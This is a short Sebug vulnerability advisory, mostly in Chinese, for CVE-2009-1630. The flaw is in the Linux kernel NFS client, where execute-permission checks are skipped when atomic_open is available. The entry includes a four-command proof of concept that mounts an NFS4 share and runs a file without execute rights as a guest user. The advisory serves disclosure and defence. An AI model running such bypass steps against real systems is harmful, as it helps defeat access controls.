Linux kernel 2.6.x
Linux Kernel NFS客户端实现MAY_EXEC权限检查漏洞
SSV ID:11320
SEBUG-Appdir:Linux
Published:2009-05-09
Vulnerable:
Discription:
BUGTRAQ ID: 34934 CVE(CAN) ID: CVE-2009-1630 Linux Kernel是开放源码操作系统Linux所使用的内核。 如果atomic_open可用的话,Linux kernel NFS客户端实现中fs/nfs/dir.c的nfs_permission函数没有检查执行(EXEC或MAY_EXEC)权限位,这允许本地用户绕过限制执行文件。
<*References
https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=500297*>
http://marc.info/?l=oss-security&m=124220557025302&w=2
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
mount -t nfs4 server:/ /mnt4 echo "ls" >/mnt4/foo chmod 744 /mnt4/foo su guest -c "mnt4/foo"
SEBUG Solution:
Linux ----- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.kernel.org/
// sebug.net [2009-05-17]